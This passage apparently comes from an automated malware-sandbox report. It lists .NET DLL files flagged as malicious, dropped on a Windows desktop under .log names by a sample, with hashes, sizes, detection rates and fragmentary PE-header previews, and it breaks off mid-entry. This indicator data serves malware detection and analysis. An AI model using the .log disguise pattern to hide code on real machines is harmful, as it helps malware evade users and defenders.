C:\Users\user\Desktop\RAMHNFsb.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\RDLnOhqQ.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 13%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\RQVXPZTR.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\RYEpuIuX.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\RzlVrZnV.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\SKDxcIEq.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\SmsYQpId.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\SoXNqeHs.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\SwGfVNiy.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\SwMdNZCQ.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\SyoPiFGW.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\TYnMSebw.log

Download File

Process:	C:\Users\user\Desktop\FuWRu2Mg82.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\TpEwEWgR.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\UGLNXWUK.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\UcbVcsDq.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	5.668291349855899
Encrypted:	false
SSDEEP:	384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
MD5:	94DA5073CCC14DCF4766DF6781485937
SHA1:	57300CA6033974810B71CF1AB4F047A026924A7A
SHA-256:	B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
SHA-512:	7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\UfIwHmIl.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\UsWpvprv.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\UyIFNWAo.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\UyzMiIGL.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\VClwANRP.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\VmFPHYcT.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\WQnMOzSe.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\WXBCJNum.log

Download File

Process:	C:\Users\user\Desktop\FuWRu2Mg82.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
